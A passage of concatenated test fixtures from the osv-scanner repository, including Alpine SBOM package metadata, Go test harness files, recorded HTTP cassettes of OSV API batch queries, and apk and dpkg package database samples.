so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.10-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.10-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.10-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/source/testmain_test.go ================================================ package source_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/source" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{source.Command} m.Run() cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/testdata/cassettes/TestCommand_SubCommands.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_SubCommands/scan_with_a_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_SubCommands/with_no_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_SubCommands/with_scan_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout-data@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout-data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout_data:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine-baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout_data:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 77824 alpine-baselayout Q1/JgpM8J6DWI/541tUX+uHEzSjqo= 11664 Natanael Copa <ncopa@alpinelinux.org> alpine-keys 2.4-r1 Public keys for Alpine Linux packages MIT cpe:2.3:a:alpine-keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* pkg:apk/alpine/alpine-keys@2.4-r1?arch=x86_64&upstream=alpine-keys&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine_keys:alpine_keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-keys:2.4-r1:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_keys:2.4-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed aab68f8c9ab434a46710de8e12fb3206e2930a59 159744 alpine-keys Q1KM01lfKVp+gEZn23awujqjSkrN8= 13361 Natanael Copa <ncopa@alpinelinux.org> apk-tools 2.12.10-r1 Alpine Package Keeper - package manager for alpine GPL-2.0-only cpe:2.3:a:apk-tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* pkg:apk/alpine/apk-tools@2.12.10-r1?arch=x86_64&upstream=apk-tools&distro=alpine-3.17.2 https://gitlab.alpinelinux.org/alpine/apk-tools apkdb-cataloger ApkMetadata apk cpe:2.3:a:apk-tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk_tools:apk_tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk-tools:2.12.10-r1:*:*:*:*:*:*:* cpe:2.3:a:apk:apk_tools:2.12.10-r1:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 0188f510baadbae393472103427b9c1875117136 307200 apk-tools so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 120973 busybox 1.35.0 cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* binary-cataloger BinaryMetadata binary cpe:2.3:a:busybox:busybox:1.35.0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /bin/busybox Sören Tempel <soeren+alpine@soeren-tempel.net> busybox-binsh 1.36.1-r27 busybox ash /bin/sh GPL-2.0-only cpe:2.3:a:busybox-binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/busybox-binsh@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:busybox-binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox_binsh:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox-binsh:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:busybox:busybox_binsh:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 8192 busybox /bin/sh cmd:sh=1.36.1-r27 Q1miWwyhWKXVEiRYLhmArV1TKMs6A= busybox=1.36.1-r27 1547 Natanael Copa <ncopa@alpinelinux.org> ca-certificates-bundle 20220614-r4 Pre generated bundle of Mozilla certificates MPL-2.0 MIT cpe:2.3:a:ca-certificates-bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* pkg:apk/alpine/ca-certificates-bundle@20220614-r4?arch=x86_64&upstream=ca-certificates&distro=alpine-3.17.2 https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ca-certificates-bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates_bundle:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca-certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca_certificates:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca-certificates-bundle:20220614-r4:*:*:*:*:*:*:* cpe:2.3:a:ca:ca_certificates_bundle:20220614-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e1839fd45a096c9e21ac24f8a61991d357d11628 237568 ca-certificates ca-certificates-cacert=20220614-r4 Q14PFUzkDXTGDcHkiuEdFuzb+EvxQ= 126296 Natanael Copa <ncopa@alpinelinux.org> libc-utils 0.7.2-r3 Meta package to pull in correct libc BSD-2-Clause BSD-3-Clause cpe:2.3:a:libc-utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/scan/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. ================================================ FILE: cmd/osv-scanner/scan/testmain_test.go ================================================ package scan_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{scan.Command} m.Run() cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/testdata/cassettes/Test_run_SubCommands.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - Test_run_SubCommands/scan_with_a_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - Test_run_SubCommands/with_no_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - Test_run_SubCommands/with_scan_subcommand url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/testdata/locks-many/alpine.cdx.xml ================================================ 2023-03-02T12:04:22+11:00 anchore syft 0.73.0 alpine:latest sha256:fd6275a37d2472b9d3be70c3261087b8d65e441c21342ae7313096312bcda2b3 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* pkg:apk/alpine/alpine-baselayout@3.4.0-r0?arch=x86_64&upstream=alpine-baselayout&distro=alpine-3.17.2 https://git.alpinelinux.org/cgit/aports/tree/main/alpine-baselayout apkdb-cataloger ApkMetadata apk cpe:2.3:a:alpine-baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine_baselayout:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine-baselayout:3.4.0-r0:*:*:*:*:*:*:* cpe:2.3:a:alpine:alpine_baselayout:3.4.0-r0:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bd965a7ebf7fd8f07d7a0cc0d7375bf3e4eb9b24 331776 alpine-baselayout Q1/eXfmbYT1WXenFSqKjroYyK84NE= alpine-baselayout-data=3.4.0-r0 /bin/sh 8890 Natanael Copa <ncopa@alpinelinux.org> alpine-baselayout-data 3.4.0-r0 Alpine base dir structure and init scripts GPL-2.0-only cpe:2.3:a:alpine-baselayout-data:alpine-baselayout-data:3.4.0-r0:*:*:*:*:*:*:* 